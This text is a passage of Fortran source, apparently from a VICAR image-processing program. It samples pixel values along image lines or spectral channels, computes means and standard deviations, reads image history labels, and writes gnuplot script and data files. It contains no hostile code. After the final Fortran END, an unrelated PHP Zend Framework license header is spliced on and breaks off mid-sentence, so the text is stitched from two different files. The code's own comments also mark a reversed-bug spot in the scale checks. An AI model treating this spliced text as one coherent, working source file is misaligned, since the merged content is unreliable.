cc write(98,fmt=10155,iostat=jj,err=995) headr(3)
cc enddo
cc11000 continue
if (.not.nolabel) then
do ii=2,iiline
i = ii - 1
j = charsteps - ii
10170 format('set label ',i2,' "',a,'" at character 15 ,',i2,
1 ' font "ariel,9" front nopoint tc def')
c 1 ' font "ariel 8" front nopoint tc def')
write(98,fmt=10170,iostat=jj,err=995) i,headermsg(ii)(1:nheadermsg(ii)), j
enddo
!! Display labels on the 2nd and possibly the 3rd page
if (i2line .eq. 0) then
              !! If i2line == 0, then 5 or fewer lines
ccc--- call header (headermsg, iiline, 0) !! Title string, lines, adjust left
else
!! Display first set of labels and header
endif
endif !if (.not.nlabel
if (nlines .eq. 1) then
iline=1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'if (nlines .eq. 1) tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
10248 format("pixel[",i4,",",i4,"]")
naline=index(alinenum,' ') - 1
endif
10250 format("plot '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"'")
write(98,fmt=10250,iostat=jj,err=995) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .eq. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'if (nlines .eq. 2) tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
c terminated with bash
10251 format("plot '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"', ",a)
write(98,fmt=10251,iostat=jj,err=995) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
iline = 2
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'iline .eq. 2 tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
10252 format (" '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"'")
write(98,fmt=10252,iostat=jj,err=995) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .gt. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'elseif (nlines .gt. 2) tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(98,fmt=10251,iostat=jj,err=995) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
do iline=2,nlines-1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'do iline=2,nlines-1 ntbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
10253 format (" '",a,"' u 1:2 t '",a,"' w linespoints lt ",i2,
1 " pt ",i2," ps 2 lc rgb '",a,"', ",a)
write(98,fmt=10253,iostat=jj,err=995) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
enddo
iline = nlines
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
c print *, 'iline = nlines tbl = ',tbl(1:ntbl)
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(98,fmt=10252,iostat=jj,err=995) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
endif
10255 format("pause mouse any") !allows plot to display on screen until mouse click
write(98,fmt=10255,iostat=jj,err=995)
close(98)
if (epsplot) then
cc
cc open eps data set
cc
open(97,file=plotgpi2(1:nplotgpi2),status='UNKNOWN',iostat=jj,err=996)
write(97,fmt=10100,iostat=jj,err=996)
write(97,fmt=10105,iostat=jj,err=996)
write(97,fmt=10110,iostat=jj,err=996) tbl(1:ntbl)
10300 format('set terminal postscript eps enhanced "Ariel" ',i2,' size 11 ,8')
write(97,fmt=10300,iostat=jj,err=996) psize ! plotwid,plotht
10305 format("set output '",a,"'")
write(97,fmt=10305,iostat=jj,err=996) ploteps(1:nploteps)
if (tics .eq. 1) then
write(97,fmt=10120,iostat=jj,err=995)
else
write(97,fmt=10121,iostat=jj,err=995)
write(97,fmt=10122,iostat=jj,err=995)
endif
write(97,fmt=10125,iostat=jj,err=996) ytitle(1:ntity)
write(97,fmt=10130,iostat=jj,err=996) xtitle(1:ntitx)
write(97,fmt=10142,iostat=jj,err=996)
write(97,fmt=10141,iostat=jj,err=996)
write(97,fmt=10145,iostat=jj,err=996) title(1:ntitle),psize
write(97,fmt=10135,iostat=jj,err=996) ysclmn,ysclmx
write(97,fmt=10140,iostat=jj,err=996) xsclmn,xsclmx
c output labels for only top 60% of plot
cc fpos=1.0 + labstep
cc do ii=2,iiline
cc i = ii - 1
cc fpos = fpos - labstep
cc10161 format('set label ',i2,' "',a,'" at graph .30 ,',f5.2,
cc 1 ' font "ariel,16" front nopoint tc def')
c 1 ' font "ariel 8" front nopoint tc def')
cc write(97,fmt=10161,iostat=jj,err=996) i,headermsg(ii)(1:nheadermsg(ii)), fpos
cc print 10160, i,headr(ii)(1:nheadr(ii)), fpos
cc10155 format("set label 2 '",a,"' at graph 0.4, 0.90 front nopoint tc def")
cc write(98,fmt=10155,iostat=jj,err=995) headr(3)
cc enddo
c
do ii=2,iiline
i = ii - 1
j = charsteps - ii
c 1 ' font "ariel 8" front nopoint tc def')
write(97,fmt=10170,iostat=jj,err=995) i,headermsg(ii)(1:nheadermsg(ii)), j
enddo
if (nlines .eq. 1) then
iline=1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10250,iostat=jj,err=996) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .eq. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10251,iostat=jj,err=996) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
iline = 2
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10252,iostat=jj,err=996) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
elseif (nlines .gt. 2) then
iline = 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10251,iostat=jj,err=996) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
do iline=2,nlines-1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10253,iostat=jj,err=996) tbl(1:ntbl),
1 alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline)),
1 bash
enddo
iline = nlines
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(iline)
ntbl=index(tbl,' ') - 1
if (gtype .eq. 1) then
alinenum=aline//num(iline)
naline=index(alinenum,' ') - 1
else
write (alinenum,10248) sl(iline),ss(iline)
naline=index(alinenum,' ') - 1
endif
write(97,fmt=10252,iostat=jj,err=996) tbl(1:ntbl),alinenum(1:naline),
1 lntype(iline),pttype(iline),ptcolor(iline)(1:ptcolorl(iline))
endif
close(97)
endif
C
C CLOSE INPUT DATA SETS
c 9999 continue
DO I=1,NI
CALL XVCLOSE(UNIT(I),STAT,' ')
ENDDO
C
RETURN
C
995 call xvmessage('??E - Error opening/writing gnuplot file',' ')
call abend
996 call xvmessage('??E - Error opening/writing gnuplot eps file',' ')
call abend
999 CALL XVMESSAGE('??E - Stacka error',' ')
CALL ABEND
END
C
C **********************************************************
C
SUBROUTINE EQUIV(X,LX,Y,LY,LCHECK,LINE,IND,tmptbl,ntbl)
c X is array of LX bytes
c Y is array of LY bytes
c   LCHECK verifies the number of bytes in LY
c IND is a return, 0=OK, 1= insufficient memory
c
implicit none
C
integer*4 ind,lcheck,lx,ly,dum
integer*4 line,ntbl
real*4 x(lx),y(ly)
character*24 tmptbl
c
IND=0
dum=lx !to suppress warning msg in compiler
IF (LY .LT. LCHECK) GO TO 899
CALL GRAPH(X,X,Y,line,tmptbl,ntbl) !,tbl,ntbl)
RETURN
C
C INSUFFICIENT MEMORY RETURN
899 IND=1
RETURN
END
C
C **********************************************************
C
SUBROUTINE GRAPH(X,RBUF,Y,line,tmptbl,ntbl) !,tbl,ntbl)
implicit none
C
COMMON/C1/ SIZE,displace,RDS,XMIN,XMAX,YMIN,YMAX
& ,XSCLMN,XSCLMX,YSCLMN,YSCLMX,XSCLDT
& ,YSCLDT,XLNGTH,YLNGTH,FORMAT,NORM,NCHAN
& ,xsclset,ysclset
COMMON/C2/ SLX,SSX,ELX,ESX,INX,UNIT,ILINE,NLINES
& ,NLI,NSI,NSCHAN,GTYPE,XPAGE,LB,LABTOP
common/files/filename
common/commonheader/headermsg,nheadermsg,iiline,i2line
c
integer*4 iiline,i2line,nheadermsg(220) !! index into header strings
C
REAL*8 MEAN,SIGMA,DBLV
REAL*4 XMAX(10),XMIN(10),YMAX(10),YMIN(10)
REAL*4 XSCLMN,XSCLMX,YSCLMN,YSCLMX
REAL*4 TXSCLMN,TXSCLMX,TYSCLMN,TYSCLMX
REAL*4 XLNGTH,YLNGTH
REAL*4 X(1),RBUF(1),Y(1),YT(4)
real*4 adx,ady,dnmax,displace,dx,dy,dz,rds,size
real*4 xinc,xl,xl1,xl2,xpage,xscldt,yinc,ypage,ypeak,yscldt
INTEGER*4 INX(10),SLX(10),SSX(10),ELX(10),ESX(10),NLI(10),NSI(10)
INTEGER*4 UNIT(10),SN,SL,SS,EL,ES,STAT,GTYPE,sinc
integer*4 id,idense,ilab,iline,in,inline,inteq,ipt,iq
integer*4 labtop,lb,linc,ln,ln2,nchan,nlab,nlines,npts
integer*4 nsamp,nschan,nx,ny,ntmptbl,ntbl
integer*4 i,j,line
LOGICAL*4 NORM,xsclset,ysclset
character*1 tab
character*4 format(10)
character*24 tbl,tmptbl
CHARACTER*24 STLAB1
CHARACTER*12 STLAB2
CHARACTER*56 LABEL(20),xheadermsg
character*56 headermsg(220) !! Labels * (lines per label+2)
character*120 filename(10)
C
character*1 num(5)
c
data num/'1','2','3','4','5'/
c data tmptbl/'tmptbl.'/
STLAB1 = 'AVE GRAY LEVEL = '
STLAB2 = 'STD DEV = '
MEAN=0.0
SIGMA=0.0
INTEQ=ILINE-1
IN=1
LN=SLX(ILINE)
SN=SSX(ILINE)
C
LINC=0
SINC=0
txsclmn = 40000000
txsclmx = 1
tysclmn = 40000000
tysclmx = 0
if (line .gt. 1) then
txsclmn = xsclmn
txsclmx = xsclmx
tysclmn = ysclmn
tysclmx = ysclmx
endif
IF (GTYPE .EQ. 1) THEN
C
IN=INX(ILINE)
SL=SLX(ILINE)
SS=SSX(ILINE)
EL=ELX(ILINE)
ES=ESX(ILINE)
NSAMP=MAX0(SS,ES)
c LINC=0
IF (EL .GT. SL) LINC=+1
IF (EL .LT. SL) LINC=-1
c SINC=0
IF (ES .GT. SS) SINC=+1
IF (ES .LT. SS) SINC=-1
END IF
C
IF (GTYPE .EQ. 2) GO TO 400
IF (EL .EQ. SL) GO TO 100
IF (ES .EQ. SS) GO TO 200
GO TO 300
C
C HORIZONTAL LINE
100 continue
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',1,'INP',IN,STAT)
NPTS=IABS(ES-SS)+1
DO 150 IPT=1,NPTS
Y(IPT)=RBUF(SN)
DBLV=Y(IPT)
MEAN=MEAN+DBLV
SIGMA=SIGMA+DBLV*DBLV
SN=SN+SINC
150 CONTINUE
c print *,"HORIZONTAL LINE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
c print *,"mean, sigma"
c print *, mean,sigma
GO TO 500
C
C VERTICAL LINE
200 continue
NPTS=IABS(EL-SL)+1
DO 250 IPT=1,NPTS
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',2,'INP',IN,STAT)
Y(IPT)=RBUF(SN)
DBLV=Y(IPT)
MEAN=MEAN+DBLV
SIGMA=SIGMA+DBLV*DBLV
LN=LN+LINC
250 CONTINUE
c print *,"VERTICAL LINE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
c print *,"mean, sigma summations"
c print *, mean,sigma
GO TO 500
C
C SLANT LINE
300 continue
NX=IABS(SS-ES)
NY=IABS(SL-EL)
NPTS=IFIX(SQRT(FLOAT(NY*NY+NX*NX)))+1
DZ=ATAN2(FLOAT(NY),FLOAT(NX))
ADX=COS(DZ)
ADY=SIN(DZ)
DX=0.0
DY=0.0
C
DO 350 IPT=1,NPTS
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',3,'INP',IN,STAT)
YT(1)=RBUF(SN)
YT(2)=RBUF(SN+SINC)
C READ NEXT LINE OF DATA (EXCEPT FOR FIRST OR LAST POINT -
C IN THAT CASE READ SAME LINE)
LN2=LN+LINC
IF (IPT .EQ. 1 .OR. IPT .EQ. NPTS) LN2=LN
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN2,'NSAMPS',NSAMP,' ')
C CALL XVCHECK('XVREAD ',4,'INP',IN,STAT)
YT(3)=RBUF(SN)
YT(4)=RBUF(SN+SINC)
C
Y(IPT)=YT(1)+DX*(YT(2)-YT(1))+DY*(YT(3)+DX*(YT(4)-YT(3))-YT(1)
& -DX*(YT(2)-YT(1)))
DBLV=Y(IPT)
MEAN=MEAN+DBLV
SIGMA=SIGMA+DBLV*DBLV
C
C CHECK FOR LINE/SAMPLE INCREMENTING
DX=DX+ADX
DY=DY+ADY
IF (DX .LT. 1.0) GO TO 330
C INCREMENT SAMPLE NUMBER
SN=SN+SINC
DX=DX-1.0
IF (DY .LT. 1.0) GO TO 350
C INCREMENT LINE NUMBER
330 LN=LN+LINC
DY=DY-1.0
350 CONTINUE
cc print *,"SLANT LINE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
c print *,"mean, sigma"
c print *, mean,sigma
GO TO 500
C
C SPECTRAL PLOT
400 continue
CALL XVREAD(UNIT(IN),RBUF,STAT,'LINE',LN,' ')
C CALL XVCHECK('XVREAD ',5,'INP',IN,STAT)
NPTS=NCHAN
DO 450 IPT=1,NPTS
Y(IPT)=RBUF((IPT-1)*NSCHAN+SN)
DBLV=Y(IPT)
MEAN=MEAN+DBLV
SIGMA=SIGMA+DBLV*DBLV
450 CONTINUE
C
C
C SCALE DATA ACCORDING TO YVALUES PARAMETERS
500 continue
DNMAX=255.0
IF (FORMAT(IN) .EQ. 'HALF') DNMAX=32767.0
IF (FORMAT(IN) .EQ. 'FULL') DNMAX=65536.0
IF (FORMAT(IN) .EQ. 'REAL') DNMAX=65536.0
YINC=(YMAX(ILINE)-YMIN(ILINE))/DNMAX
yinc = 1.0
IF ((YINC .EQ. 1.) .AND. (YMIN(ILINE) .EQ. 0.)) GO TO 620
DO 610 ID=1,NPTS
Y(ID)=Y(ID)*YINC+YMIN(ILINE)
610 CONTINUE
cc print *,"scale to YVALUES:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C SCALE DATA ACCORDING TO RDS PARAMETER
620 continue
IF (RDS .EQ. 0) GO TO 630
DO 625 ID=1,NPTS
Y(ID)=SQRT(AMAX1(Y(ID)**2-RDS**2,0.))
625 CONTINUE
cc print *,"scale to RDS:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C NORMALIZE DATA
630 continue
IF (.NOT.NORM) GO TO 640
YPEAK=Y(1)
DO 635 ID=2,NPTS
IF (YPEAK .LT. Y(ID)) YPEAK=Y(ID)
635 CONTINUE
DO 638 ID=1,NPTS
Y(ID)=Y(ID)/YPEAK
638 CONTINUE
cc print *,"NORMALIZE:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C ADD DISPLACEMENT
640 continue
IF (displace .NE. 0.) then
DO ID=1,NPTS
Y(ID)=Y(ID)+INTEQ*displace
ENDDO
ENDIF
cc print *,"ADD DISPLACEMENT:"
cc do i=1,npts
cc print *,"-", x(i),y(i)
cc enddo
C
C COMPUTE MEAN AND STANDARD DEVIATION
MEAN=MEAN/NPTS
SIGMA=DSQRT(DABS(SIGMA/NPTS-MEAN*MEAN))
c print *, "MEAN, STDDEV:"
c print *, mean,sigma
C
C LOAD X ARRAY
X(1)=XMIN(ILINE)
XINC=(XMAX(ILINE)-XMIN(ILINE))/(NPTS-1)
c print *, "LOAD X-ARRAY INCREMENT xinc = ",xinc
IF (XINC .NE. 0.) GO TO 660
X(1)=1.
XINC=1.
660 DO 665 IQ=2,NPTS
X(IQ)=X(IQ-1)+XINC
665 CONTINUE
c now append XSCLMN and XSCLDT to X array
X(NPTS+1)=XSCLMN
X(NPTS+2)=XSCLDT
C
c
c print *,'ysclset, xsclset = ',ysclset,xsclset
if (.not.ysclset) then
DO ID=1,NPTS
cc print *,ID,Y(ID),YSCLMX,YSCLMN
IF (Y(ID) .GT. YSCLMX) YSCLMX=Y(ID) !bug here, reversed
IF (Y(ID) .LT. YSCLMN) YSCLMN=Y(ID)
ENDDO
endif
c X in VICAR IMAGE Always starts at 1,1
if (.not.xsclset) then
c xsclmn = 1
DO ID=1,NPTS
IF (X(ID) .GT. XSCLMX) XSCLMX=X(ID) !bug here, reversed
IF (X(ID) .LT. XSCLMN) XSCLMN=X(ID)
ENDDO
endif
c
cc print *, "ysclmn, ysclmx = ",ysclmn, ysclmx
cc print *, "tysclmn, tysclmx = ",tysclmn, tysclmx
cc print *, "xsclmn, xsclmx = ",xsclmn, xsclmx
cc print *, "txsclmn, txsclmx = ",txsclmn, txsclmx
c
if (line .gt. 1) then
if (txsclmn .lt. xsclmn) xsclmn = txsclmn
if (txsclmx .gt. xsclmx) xsclmx = txsclmx
if (tysclmn .lt. ysclmn) ysclmn = tysclmn
if (tysclmx .gt. ysclmx) ysclmx = tysclmx
endif
c
cc print *, "ysclmn, ysclmx = ",ysclmn, ysclmx
cc print *, "xsclmn, xsclmx = ",xsclmn, xsclmx
c
c now append YSCLMN and YSCLDT to Y array
Y(NPTS+1)=YSCLMN
Y(NPTS+2)=YSCLDT
IDENSE=NPTS/XLNGTH
IF (NLINES .EQ. 1) IDENSE=0
C
!! Set SCALE factor to 1.0, as XRT/graph will automatically scale
!! the X & Y values before displaying the values.
x(npts+2) = 1.0
y(npts+2) = 1.0
ccc--- CALL LINE (X,Y,NPTS,1,IDENSE,INTEQ)
!! Move to (0,0) and set new origin
ccc--- call setactiveset (0)
ccc--- call plot (0.0, 0.0, 3)
TAB=CHAR(9)
ccccc tbl=tbl(1:ntbl)//num(iline)
ccccc ntbl=index(tbl,' ') - 1
ntmptbl=index(tmptbl,' ') - 1
tbl=tmptbl(1:ntmptbl)//num(line)
ntbl=index(tbl,' ') - 1
c print *, 'before OPEN(99,FILE=TBL( tbl = ',tbl(1:ntbl)
OPEN(99,FILE=TBL(1:ntbl),STATUS='UNKNOWN',IOSTAT=J,ERR=998)
do i=1,npts
10100 format (1x,f8.0,a1,f10.3)
WRITE(99,FMT=10100,IOSTAT=J,ERR=998) x(i),tab, y(i)
enddo
CLOSE(99)
C
C
C **********************************************************
C
C * LABEL PROCESSING *
C
inline = 1
YPAGE=AMAX1(7.,YLNGTH)
IF (LABTOP .EQ. 1) YPAGE=11.5
XL2=0.
XL1=0
IF (SIZE .EQ. 0.) GO TO 800
C CHECK IF SAME DATA SET
IF(LB.EQ.0) GO TO 710
headermsg (iiline) = 'SAME LABELS'
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
inline =inline + 1
YPAGE = YPAGE-2.0*SIZE
GO TO 730
C
C GET LABELS
710 continue
CALL LABGET(UNIT(IN),NLAB,LABEL)
C PRINT LABELS
xheadermsg = ' '
write (xheadermsg (1:),'(a)') 'Line '
write (xheadermsg (6:),'(i2)') ILINE
write (xheadermsg (9:),'(a)') ' - '
write (xheadermsg (12:50),'(a)') filename(iline)(1:38)
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
DO 720 ILAB=1,NLAB
C CALL SYMBOL(XPAGE,YPAGE,SIZE,%DESCR(LABEL(1,ILAB)),0,0.,NCH)
headermsg (iiline) = label(ilab)
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
c print *, 'headermsg = ',headermsg (iiline)
iiline = iiline + 1
720 CONTINUE
C PRINT MEAN AND STANDARD DEVIATION
730 continue
	write (xheadermsg (1:),'(a)') stlab1		!! 'AVE GRAY LEVEL = '
write (xheadermsg (18:),'(f8.2)') mean
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
write (xheadermsg (1:),'(a)') stlab2 !! 'STD DEV = '
write (xheadermsg (11:),'(f6.2)') sigma
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
C PRINT SL, SS, EL, ES
IF(GTYPE.EQ.1) THEN
write (xheadermsg (1:),'(a)') 'SL='
write (xheadermsg (4:),'(i3)') SL
write (xheadermsg (11:),'(a)') 'SS='
write (xheadermsg (14:),'(i3)') SS
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
iiline = iiline + 1
write (xheadermsg (1:),'(a)') 'EL='
write (xheadermsg (4:),'(i3)') el
	    write (xheadermsg (11:),'(a)') 'ES='
write (xheadermsg (14:),'(i3)') es
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
c print *,'header = ',headermsg(iiline)(1:nheadermsg (iiline))
iiline = iiline + 1
ELSE
write (xheadermsg (1:),'(a)') 'LINE='
	    write (xheadermsg (6:),'(f6.2)') float(ln)
	    write (xheadermsg (14:),'(a)') 'SAMPLE='
	    write (xheadermsg (21:),'(f6.2)') float(sn)
headermsg (iiline) = xheadermsg
nheadermsg (iiline)=56 !index(xheadermsg,' ') - 1
c print *,'header = ',headermsg(iiline)(1:nheadermsg (iiline))
iiline = iiline + 1
END IF
C
800 XL=AMAX1(XL1-XPAGE,XL2-XPAGE)
XPAGE=XPAGE+XL+0.5
iiline = iiline + 1 !! Bump index for header strings
C
RETURN
998 call xvmessage('??E - Error writing gnuplot file - graph',' ')
call abend
return
END
C
C
C
C **********************************************************
C
C
C
SUBROUTINE LABGET(UNIT,NLAB,LABEL)
implicit none
INTEGER*4 INSTAN(200),STAT,UNIT,COUNT,NLAB
integer*4 i,j,ichar,ilab,length,lvalue,ntasks
CHARACTER*500 VALUE
CHARACTER*32 FORMAT
CHARACTER*28 TIME,LTIME
CHARACTER*8 TASKS(200),UNAME,LUNAME
CHARACTER*32 KEY,LKEY
CHARACTER*1600 LTASKS
C LOGICAL*1 LTASKS(1600),LUNAME(8),LKEY(32)
CHARACTER*56 LABEL(20)
C LOGICAL*1 LABEL(56,20),LTIME(28),LVALUE(500)
EQUIVALENCE (TASKS,LTASKS),(UNAME,LUNAME),(TIME,LTIME)
EQUIVALENCE (KEY,LKEY),(VALUE,LVALUE)
C BLANK OUT LABEL BUFFER AND INITIALIZE LABEL POINTER
DO I=1,20
LABEL(I) = ' '
ENDDO
C CALL MVE(1,20*56,' ',LABEL,0,1)
ILAB=1
NTASKS=200
C
C GET NAMES OF ALL HISTORY TASKS
CALL XLHINFO(UNIT,TASKS,INSTAN,NTASKS,STAT,' ')
C CALL XVCHECK('XLHINFO ',1,'INP',UNIT,STAT)
C
DO 200 I=1,NTASKS
C GET USER AND TIME
CALL XLGET(UNIT,'HISTORY','USER',UNAME,STAT,'HIST',TASKS(I),
& 'INSTANCE',INSTAN(I),'FORMAT','STRING',' ')
C CALL XVCHECK('XLGET ',1,'INP',UNIT,STAT)
CALL XLGET(UNIT,'HISTORY','DAT_TIM',TIME,STAT,'HIST',
& TASKS(I),'INSTANCE',INSTAN(I),'FORMAT','STRING',' ')
c CALL XVCHECK('XLGET ',2,'INP',UNIT,STAT)
C CONVERT DAT_TIM TO UPPERCASE
CALL CCASE(TIME,1,28)
C FILL IN TASK, USER, TIME LINE
C 1 2 3 4 4
C 1234567890123456789012345678901234567890123456789
LABEL(ILAB) = 'TASK: USER: '
WRITE(LABEL(ILAB)(7:14), '(A8)' ) LTASKS(8*I-7:8*I)
WRITE(LABEL(ILAB)(23:30), '(A8)' ) LUNAME
WRITE(LABEL(ILAB)(33:56), '(A24)' ) LTIME
c CALL MVL('TASK:',LABEL(1,ILAB),5)
c CALL MVL(LTASKS(8*I-7),LABEL(7,ILAB),8)
c CALL MVL('USER:',LABEL(17,ILAB),5)
c CALL MVL(LUNAME,LABEL(23,ILAB),8)
c CALL MVL(LTIME,LABEL(33,ILAB),24)
ILAB=ILAB+1
IF (ILAB .GT. 20) GO TO 500
C
C SET TO CURRENT TASK
CALL XLINFO(UNIT,'HISTORY','TASK',FORMAT,LENGTH,COUNT,
& STAT,'HIST',TASKS(I),'INSTANCE',INSTAN(I),' ')
C CALL XVCHECK('XLINFO ',1,'INP',UNIT,STAT)
ICHAR=1
C
DO 100 J=1,999
C GET NEXT KEYWORD
CALL XLNINFO(UNIT,KEY,FORMAT,LENGTH,COUNT,STAT,' ')
IF (STAT .NE. 1 .OR. KEY .EQ. 'TASK') GO TO 150
IF (KEY .EQ. 'DAT_TIM' .OR. KEY .EQ. 'USER') GO TO 100
C GET VALUE
CALL XLGET(UNIT,'HISTORY',KEY,VALUE,STAT,'HIST',TASKS(I),
& 'INSTANCE',INSTAN(I),'FORMAT','STRING',
& 'LENGTH',LENGTH,' ')
c CALL XVCHECK('XLGET ',3,'INP',UNIT,STAT)
C TRUNCATE VALUE IF KEYWORD AND VALUE WILL NOT FIT ON ONE LINE
IF (LENGTH .GT. 47) LENGTH=47
C SEE IF KEYWORD AND VALUE WILL FIT ON PRESENT LINE
IF (ICHAR+LENGTH+9 .LT. 56) GO TO 50
ICHAR=1
ILAB=ILAB+1
IF (ILAB .GT. 20) GO TO 500
C FILL IN KEYWORD AND VALUE INTO LABEL BUFFER
50 WRITE(LABEL(ILAB)(ICHAR:(ICHAR+7)), '(A8)') LKEY
WRITE(LABEL(ILAB)(ICHAR+8:ICHAR+8), '(A1)' ) '='
WRITE(LABEL(ILAB)(ICHAR+9:), '(A)') LVALUE
C CALL MVL(LKEY,LABEL(ICHAR,ILAB),8)
C CALL MVL('=',LABEL(ICHAR+8,ILAB),1)
C CALL MVL(LVALUE,LABEL(ICHAR+9,ILAB),LENGTH)
ICHAR=ICHAR+LENGTH+11
C
100 CONTINUE
150 ILAB=ILAB+1
IF (ILAB .GT. 20) GO TO 500
200 CONTINUE
500 NLAB = ILAB-1
RETURN
END
<?php
/**
* Zend Framework
*
* LICENSE
*
* This source file is subject to the new BSD license that is bundled
* with this package in the file LICENSE.txt.
* It is also available through the world-wide-web at this URL:
